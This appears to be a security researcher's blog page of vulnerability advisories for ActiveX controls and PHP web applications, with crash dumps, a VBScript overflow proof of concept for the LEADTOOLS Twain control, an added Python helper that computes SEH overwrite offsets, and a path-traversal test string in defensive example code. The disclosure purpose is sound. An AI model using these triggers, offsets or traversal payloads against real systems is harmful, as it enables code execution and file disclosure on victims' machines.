Posts Tagged ‘risk’

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When an overly long string is passed as the pid item of the GetItem1 function in the elonfmt.ocx module, several registers are overwritten, including the SEH handler. Note that the input is translated before it is copied: the bytes that reach memory are not the characters that were sent but a translated form (the runs of 0xAA, 0xBB, 0xCC and 0xDD bytes in the dumps below), which has to be taken into account when placing the nSEH/SEH overwrite. The dumps come from two runs: the first, with a plain fill, lands both EIP and the handler on AAAAAAAA; the second, with marker bytes, shows the exception record at 0013ecf0 overwritten with a next-record pointer of bbbbbbbb and a handler of cccccccc, and EIP following the handler to cccccccc. An attacker can exploit this to execute arbitrary code on the affected node.

—————————————————————–
CompanyName
FileDescription ElonFmt ActiveX Control Module
FileVersion 1, 1, 14, 1
InternalName ElonFmt
LegalCopyright Copyright (C) 2002 – 2008 Gesytec GmbH
OriginalFileName ElonFmt.OCX
ProductName ElonFmt ActiveX Control Module
ProductVersion 1, 1, 14, 1
—————————————————————–

Exception Code: ACCESS_VIOLATION
Disasm: AAAAAAAA ????? ()

Seh Chain:
————————————————–
1 7C9032BC ntdll.dll
2 AAAAAAAA

Registers:
————————————————–
EIP AAAAAAAA
EAX 00000000
EBX 00000000
ECX AAAAAAAA
EDX 7C9032BC -> 04244C8B
EDI 00000000
ESI 00000000
EBP 0013E7F8 -> 0013E8A8
ESP 0013E7D8 -> 7C9032A8

Block Disassembly:
————————————————–
AAAAAAAA ????? <--- CRASH

ArgDump:
--------------------------------------------------
EBP+8 0013E8C0 -> C0000005
EBP+12 0013ECF0 -> AAAAAAAA
EBP+16 0013E8DC -> 0001003F
EBP+20 0013E894 -> 7C96F3BC
EBP+24 AAAAAAAA
EBP+28 00000236

Stack Dump:
————————————————–
13EBA8 01 00 00 00 00 00 00 00 08 AF 47 00 81 18 C3 77 [……….G….w]
13EBB8 14 2C 00 00 A2 56 00 10 41 ED 13 00 E8 EB 13 00 […..V……….]
13EBC8 20 8F 63 01 B8 8E 63 01 81 18 C3 77 01 00 00 00 [..c…c….w….]
13EBD8 64 21 12 77 FF 00 00 00 74 E1 97 7C 51 7C 91 7C [d..w….t…Q…]
13EBE8 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA […………….]

———————————————–

(fc.1608): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)

0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 …..aS.|Zc…..
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ……..$FS…..
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc…..`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ….h………..
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ……….st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ……..@.G….w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 …..V……….
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c…c….w….
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w….t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec58 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ec68 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec78 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec88 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ec98 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013eca8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecb8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecc8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0013ecd8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa …………….
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc …………….
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 …………..c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ……c………
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ……….c.(…
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ……c……C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \……………
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V…..x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H……………
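The offsets that matter for this crash can be read straight off the `d` output above. The following Python is an added example, not part of the original advisory and not Gesytec's code: it parses a constructed excerpt of that WinDbg dump (addresses and bytes copied from the post; the all-0xAA lines between the first fill line and the marker line are left out, and the parser tolerates such gaps) into an address-to-byte map, finds where the 0xAA fill run starts and where the 0xBB and 0xCC markers land, and derives the distance to the nSEH pointer and the SEH handler in translated bytes. It then checks that the overwritten record agrees with what `!exchain` printed (record at 0013ecf0, handler cccccccc).

```python
import re

# Constructed excerpt of the WinDbg `d` output from the post above (addresses
# and bytes copied from it; the intermediate all-0xAA lines are omitted and
# the parser tolerates the gap). The ASCII column on the right is ignored.
WINDBG_DUMP = """\
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w....t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc ................
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 ..............c.
"""

# One `d`/`db` line: 8 hex-digit address, then 16 bytes split 8-8 by a dash.
DUMP_LINE = re.compile(
    r"^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}[ -]){15}[0-9a-fA-F]{2})")


def parse_dump(text):
    """Turn WinDbg byte-dump lines into a {address: byte} map."""
    mem = {}
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue                       # prompt lines, blanks, etc.
        base = int(m.group(1), 16)
        for i, tok in enumerate(re.split(r"[ -]", m.group(2))):
            mem[base + i] = int(tok, 16)
    return mem


def first_address(mem, value):
    """Lowest address holding `value`, i.e. the start of a marker run."""
    hits = [addr for addr, b in mem.items() if b == value]
    return min(hits) if hits else None


def dword_at(mem, addr):
    """Little-endian DWORD at `addr`, as the CPU and the SEH walker read it."""
    return sum(mem[addr + i] << (8 * i) for i in range(4))


def seh_layout(mem, fill=0xAA, nseh_marker=0xBB, seh_marker=0xCC):
    """Offsets, in translated bytes from the start of the fill run, of the
    overwritten nSEH pointer and SEH handler, plus the values they hold."""
    start = first_address(mem, fill)
    nseh_addr = first_address(mem, nseh_marker)
    seh_addr = first_address(mem, seh_marker)
    if None in (start, nseh_addr, seh_addr) or seh_addr != nseh_addr + 4:
        raise ValueError("marker runs missing or not an adjacent nSEH/SEH pair")
    return {
        "fill_start": start,
        "nseh_offset": nseh_addr - start,
        "seh_offset": seh_addr - start,
        "record_addr": nseh_addr,              # the address !exchain lists
        "nseh_value": dword_at(mem, nseh_addr),
        "seh_value": dword_at(mem, seh_addr),
    }


def matches_exchain(layout, record_addr, handler):
    """Cross-check against `!exchain`: the record address and handler it
    printed must be the ones the computed offsets point at."""
    return layout["record_addr"] == record_addr and layout["seh_value"] == handler


if __name__ == "__main__":
    layout = seh_layout(parse_dump(WINDBG_DUMP))
    print(f"nSEH at +{layout['nseh_offset']}, SEH at +{layout['seh_offset']} "
          f"(record {layout['record_addr']:08x}, handler {layout['seh_value']:08x})")
    print("consistent with !exchain:", matches_exchain(layout, 0x0013ECF0, 0xCCCCCCCC))
```

On the dump above this yields nSEH at +264 and the handler at +268 translated bytes from the first 0xAA, which is the distance any payload for this control has to reproduce after the translation, not before it.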

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php

DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities

DoceboLMS suffers from multiple stored XSS vulnerabilities, both pre- and post-authentication. Input passed through the POST parameters ‘name’, ‘code’ and ‘title’ to index.php is not sanitized, allowing an attacker to execute HTML and script code in a user’s browser session on the affected site. URI-based XSS vulnerabilities are also present.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5006.php

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC

A buffer overflow vulnerability has been identified in Macro Express Pro; the same flaw may also exist in the regular edition and in older versions of Macro Express and Macro Express Pro. We reported the issue to the vendor through their bug reporting system (http://www.macros.com/bugreport.htm) and received no response, confirmation or cooperation.

While debugging the application we were able to overwrite several registers, which can be leveraged to execute arbitrary code on the affected system.

You can take a look at the advisory here: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php

Mantis Bug Tracker security advisories and patches

Today, Zero Science Lab, in cooperation with the MantisBT Group, published security advisories and patches for the popular open-source bug tracking system MantisBT. These are several serious vulnerabilities through which an attacker can obtain sensitive information from the affected system via directory traversal, or execute HTML code in the user's browser through an XSS attack.

The weakness lies in the “upgrade_unattended.php” script, located in the “admin” folder. When the “db_type” parameter is supplied, whether via GET or POST, the application does not perform sufficient and controlled sanitization of the user input, which results in disclosure of system information.

By classification, these are Reflected (Non-persistent) Cross-Site Scripting, Local File Inclusion/Disclosure and Path Disclosure vulnerabilities. We tested against “live” websites (with permission) and decided to rate the vulnerabilities as Medium Risk (XSS) and High Risk (LFI).

Many thanks to David Hicks and Victor Boctor of the MantisBT group, who responded to the reported weaknesses and reacted in the shortest possible time, publishing a patch and advisories, followed by the release of version 1.2.4. Although David pointed out that there was a “Warning” that the “admin” folder should be deleted after installation, I did not see such a warning because of the different operating systems and PHP permissions, and we concluded that many MantisBT installations on the Internet still have the “admin” folder present.

Besides the public advisories, we also published an official Google Dork with the Exploit-DB community: http://www.exploit-db.com/ghdb/3651/

The advisories from ZSL as well as from MantisBT can be found below:

ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability
MantisBT: http://www.mantisbt.org/bugs/view.php?id=12607

Update. ;}

Exponent CMS v0.97 Multiple Vulnerabilities

Vendor: OIC Group Inc.
Product web page: http://www.exponentcms.org
Affected version: 0.97

Summary: Open Source Content Management System (PHP+MySQL).

Desc: Exponent CMS suffers from multiple vulnerabilities:

#1. Local File Inclusion / File Disclosure Vulnerability
#2. Arbitrary File Upload / File Modify Vulnerability
#3. Reflected Cross-Site Scripting Vulnerability

(1) LFI/FD occurs when input passed thru the params:
– “action”
– “expid”
– “ajax_action”
– “printerfriendly”
– “section”
– “module”
– “controller”
– “int”
– “src”
– “template”
– “page”
– “_common”

to the scripts:
– “index.php”
– “login_redirect.php”
– “mod_preview.php”
– “podcast.php”
– “popup.php”
– “rss.php”

is not properly verified before being used to include files.
This can be exploited to include files from local resources
with directory traversal attacks and URL encoded NULL bytes.

(2) AFU/E occurs due to an error in:
– “upload_fileuploadcontrol.php”
– “upload_standalone.php”
– “manifest.php”
– “delete.php”
– “edit.php”
– “manage.php”
– “rank_switch.php”
– “save.php”
– “view.php”
– “class.php”
– “deps.php”
– “delete_form.php”
– “delete_process.php”
– “search.php”
– “send_feedback.php”
– “viewday.php”
– “viewmonth.php”
– “viewweek.php”
– “testbot.php”
– “activate_bot.php”
– “deactivate_bot.php”
– “manage_bots.php”
– “run_bot.php”
– “class.php”
– “delete_board.php”
– “delete_post.php”
– “edit_board.php”
– “edit_post.php”
– “edit_rank.php”
– “monitor_all_boards.php”
– “monitor_board.php”
– “monitor_thread.php”
– “preview_post.php”
– “save_board.php”
– “save_post.php”
– “save_rank.php”
– “view_admin.php”
– “view_board.php”
– “view_rank.php”
– “view_thread.php”
– “banner_click.php”
– “ad_delete.php”
– “ad_edit.php”
– “ad_save.php”
– “af_delete.php”
– “af_edit.php”
– “af_save.php”
– “delete_article.php”
– “edit_article.php”
– “save_article.php”
– “save_submission.php”
– “submit_article.php”
– “view_article.php”
– “view_submissions.php”
– “coretasks.php”
– “htmlarea_tasks.php”
– “search_tasks.php”
– “clear_smarty_cache.php”
– “configuresite.php”
– “config_activate.php”
– “config_configuresite.php”
– “config_delete.php”
– “config_save.php”
– “examplecontent.php”
– “finish_install_extension.php”
– “gmgr_delete.php”
– “gmgr_editprofile.php”
– “gmgr_membership.php”
– “gmgr_savegroup.php”
– “gmgr_savemembers.php”

as it allows uploads of files with multiple extensions to a
folder inside the web root. This can be exploited to execute
arbitrary PHP code by uploading a specially crafted PHP script.

The uploaded files are stored in: [CMS_ROOT_HOST]\files

(3) XSS occurs when input passed to the params:
– “u”
– “expid”
– “ajax_action”
– “ss”
– “sm”
– “url”
– “rss_url”
– “lang”
– “toolbar”
– “section”
– “section_name”
– “src”

in scripts:
– “slideshow.js.php”
– “picked_source.php”
– “magpie_debug.php”
– “magpie_simple.php”
– “magpie_slashbox.php”
– “test.php”
– “fcktoolbarconfig.js.php”
– “section_linked.php”
– “index.php”

is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script
code in a user’s browser session in context of an affected site.

Tested on: Microsoft Windows XP Professional SP3 (English)
Apache 2.2.14 (Win32)
MySQL 5.1.41
PHP 5.3.1

Vendor status: [09.10.2010] Vulnerabilities discovered.
[10.10.2010] Vendor contacted.
[13.10.2010] No reply from vendor.
[14.10.2010] Public advisory released.

Advisory ID: ZSL-2010-4969
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4969.php

Vulnerabilities discovered by: Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com
Zero Science Lab – http://www.zeroscience.mk

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4969.php

Raw analysis (hi 5 John Leitch): Log_Exponent.txt (616 KB)
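The include bug in (1) and the upload bug in (2) of the Exponent CMS advisory above, and the db_type include in the MantisBT post earlier on this page, are the same two mistakes in different clothes: a request parameter is concatenated into a filesystem path, and an uploaded file name is judged by its last extension only. The Python below is an added example and is not code from Exponent CMS, MantisBT or Zero Science Lab. It models the vulnerable pattern (including the pre-5.3.4 PHP behaviour in which a NUL byte in the path truncates the appended “.php”, which is exactly what the URL-encoded NULL byte exploits) next to a hardened version of each check. The web root, module directory, upload directory and allowed extensions are assumed values, and the lookups use string operations only so the code runs without those directories existing.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed deployment layout (hypothetical; not Exponent's or MantisBT's real paths).
WEB_ROOT = "/var/www/cms"
MODULES_DIR = posixpath.join(WEB_ROOT, "modules")
UPLOAD_DIR = posixpath.join(WEB_ROOT, "files")
ALLOWED_UPLOAD_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}
MODULE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")
UPLOAD_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def naive_include_path(param):
    """Vulnerable pattern: decode the parameter, glue it onto a directory,
    append '.php'. Older PHP handed the result to a C open(), which stops at
    the first NUL byte, so '%00' discards the extension and '../' walks out
    of the directory (local file inclusion / disclosure)."""
    raw = unquote(param)
    path = posixpath.join(MODULES_DIR, raw + ".php")
    path = path.split("\0", 1)[0]             # C-string truncation at NUL
    return posixpath.normpath(path)


def safe_include_path(param, allowed=None):
    """Hardened form: refuse NUL bytes and anything that is not a bare
    identifier, optionally pin the value to a fixed allowlist (the right fix
    for something like a database driver name), and confirm the normalized
    result still lives under MODULES_DIR. Returns None on rejection."""
    raw = unquote(param)
    if "\0" in raw or not MODULE_NAME.fullmatch(raw):
        return None
    if allowed is not None and raw not in allowed:
        return None
    path = posixpath.normpath(posixpath.join(MODULES_DIR, raw + ".php"))
    if not path.startswith(MODULES_DIR + "/"):
        return None                            # defence in depth after the regex
    return path


def naive_upload_ok(filename):
    """Vulnerable pattern: only the last extension is inspected, so
    'shell.php.jpg' passes. A server that maps handlers by any extension
    segment (Apache mod_mime with AddHandler for .php) will execute it."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_UPLOAD_EXT


def safe_upload_name(filename):
    """Hardened form: keep only the base name, demand exactly one extension
    from the allowlist and a stem from a safe character set. Returns the
    normalized name to store under UPLOAD_DIR, or None."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if "\0" in name:
        return None
    parts = name.split(".")
    if len(parts) != 2:
        return None
    stem, ext = parts
    if not UPLOAD_STEM.fullmatch(stem) or ext.lower() not in ALLOWED_UPLOAD_EXT:
        return None
    return f"{stem}.{ext.lower()}"


if __name__ == "__main__":
    lfi = "../../../../etc/passwd%00"
    print("naive include :", naive_include_path(lfi))          # /etc/passwd
    print("safe include  :", safe_include_path(lfi))           # None
    print("naive upload accepts shell.php.jpg:", naive_upload_ok("shell.php.jpg"))
    print("safe upload name for shell.php.jpg :", safe_upload_name("shell.php.jpg"))
```

The allowlist argument is the part that matters for a value like db_type: a database driver name has a handful of legal values, so the check should be membership in that set, not sanitization of arbitrary input.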

Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC

Vendor: Softek Software Ltd
Product web page: http://www.bardecode.com
Affected version: 7.1.4.14

Summary: The Softek Barcode Reader Toolkit for Windows is an SDK that enables applications
to extract barcode information from images. The APIs available in the toolkit include .NET,
Java, COM, OCX and Windows DLL. The standard version includes support for both 1-D and 2-D
barcodes, and special features include the ability to split documents by barcode position.

Desc: The vulnerability is caused due to a boundary error in SoftekATL.DLL when handling the
value assigned to the “DebugTraceFile” property and can be exploited to cause a heap-based
buffer overflow via an overly long string which may lead to execution of arbitrary code.

————————————————————————–

(824.ce0): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=44444444 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4444443c
eip=7c96fa89 esp=0013f0a0 ebp=0013f100 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707 movzx eax,word ptr [edi] ds:0023:4444443c=????
0:000> g
(824.ce0): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=42424242 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4242423a
eip=7c96fa89 esp=0013f0ac ebp=0013f10c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707 movzx eax,word ptr [edi] ds:0023:4242423a=????
0:000> g
eax=00000000 ebx=00000000 ecx=7c800000 edx=7c97e120 esi=7c90de6e edi=00000000
eip=7c90e514 esp=0013fe5c ebp=0013ff58 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
7c90e514 c3 ret

———————–

EIP 7C96FA89
EAX 00000001
EBX 42424242
ECX 7FFDD000 -> 0013F0FC
EDX 00470608 -> 00152CA0
EDI 42424239
ESI 00470000 -> 000000C8
EBP 0013F10C -> 0013F1F4
ESP 0013F0AC -> 00470000

————————————————————————–

Tested on: Microsoft Windows XP Professional SP3 (English)
Microsoft Windows Internet Explorer 8.0.6001.18702
Softek Barcode Reader 7.3.1

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4965.php

Netautor Professional 5.5.0 (goback) XSS Vulnerability

Vendor: /digiconcept/
Product web page: http://www.digiconcept.net
Affected version: 5.5.0 and DW 5.3.1

Summary: Netautor Professional is an application server and
development environment. Netautor Professional was developed
to serve the practical needs of users and has been continuously
advanced.

Digital Workroom is a well-proven and time-tested Content Management
System. It is based on digiconcept's own application server
“Netautor Professional” and PHP 5. The standard feature set covers
most needs of Internet and intranet environments for publication
and communication.

Desc: Netautor Professional v5.5.0 suffers from an XSS vulnerability because
input passed via the “goback” parameter to the login2.php script is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user’s browser session in the context of an
affected site.

Tested on: MS WinXP Pro SP3 (EN)
PHP 5.3.0
MySQL 5.1.36
Apache 2.2.11 (Win32)

Vendor status: [14.09.2010] Vulnerability discovered.
[15.09.2010] Contact with the vendor.
[17.09.2010] No reply from vendor.
[17.09.2010] Public advisory released.

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4964.php

LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote
vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in
different objects included in the Common Dialogs class.

Vulnerable Objects/OCX Dialogs (Win32):

1. ActiveX Common Dialogs (Web) ——————–> LtocxWebDlgu.dll
2. ActiveX Common Dialogs (Effects) —————-> LtocxEfxDlgu.dll
3. ActiveX Common Dialogs (Image) ——————> LtocxImgDlgu.dll
4. ActiveX Common Dialogs (Image Effects) ———-> LtocxImgEfxDlgu.dll
5. ActiveX Common Dialogs (Image Document)———-> LtocxImgDocDlgu.dll
6. ActiveX Common Dialogs (Color) ——————> LtocxClrDlgu.dll
7. ActiveX Common Dialogs (File) ——————-> LtocxFileDlgu.dll

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4961.php

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundary of the user input.

Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

===============================================================

(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================

Registers:
————————————————–
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000

ArgDump:
————————————————–
EBP+8    016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    00000000
EBP+20    0013EF6C -> BAAD0008
EBP+24    100255BC -> 10014840 -> Asc: @H@H
EBP+28    0013EDB8 -> 00000000

EBP+8    00150000 -> 000000C8
EBP+12    00410039
EBP+16    7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20    00000000
EBP+24    00410041
EBP+28    7C80FF12 -> 9868146A

CompanyName        LEAD Technologies, Inc.
FileDescription        LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion        16,5,0,2
InternalName        LTRTNU
LegalCopyright        © 1991-2009 LEAD Technologies, Inc.
OriginalFileName        LTRTNU.DLL
ProductName        LEADTOOLS® for Win32
ProductVersion        16.5.0.0

Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E    MOV [ECX],AX    (ntdll.dll)
Disasm: 7C96C540    CMP BYTE PTR [EBX+7],FF    (ntdll.dll)

Exception Code: BREAKPOINT

Disasm: 7C90120E    INT3    (ntdll.dll)

Seh Chain:
————————————————–
1     7C839AC0     KERNEL32.dll
2     FC2950         VBSCRIPT.dll
3     7C90E900     ntdll.dll

7C912F4E    MOV [ECX],AX            <— CRASH
7C96C540    CMP BYTE PTR [EBX+7],FF        <— CRASH
7C90120F    RETN                <— CRASH

==================================================================

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

PoC:

<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>

' COMRaider-style PoC: the variables below only document the fuzzed member;
' nothing reads them, the overflow is triggered by the AppName assignment.
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1

' 9236-byte string; the control copies it without a length check
arg1=String(9236, "A")

target.AppName = arg1

</script>

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960_pvt.php

Multiple Vendors DLL Hijacking Exploits

That's right :)

H D Moore (Metasploit Project), after stating that he had found some forty DLL hijacking vulnerabilities in Windows applications, released on 22 August the kit for auditing DLL libraries and “hijacking” them. This is DLLHijackAuditKit v2, which checks every file extension registered on your system and the libraries their handlers look for, and then generates exploits for them. The kit is simple to use: the audit takes 15 to 30 minutes, after which exploit code is generated in an Exploits folder, which you can use for whatever purpose you like :)

More: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html and http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Naturally, so as not to be left behind, the Zero Science Lab team also audited one of its lab systems and found quite a few vulnerabilities, which follow...

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

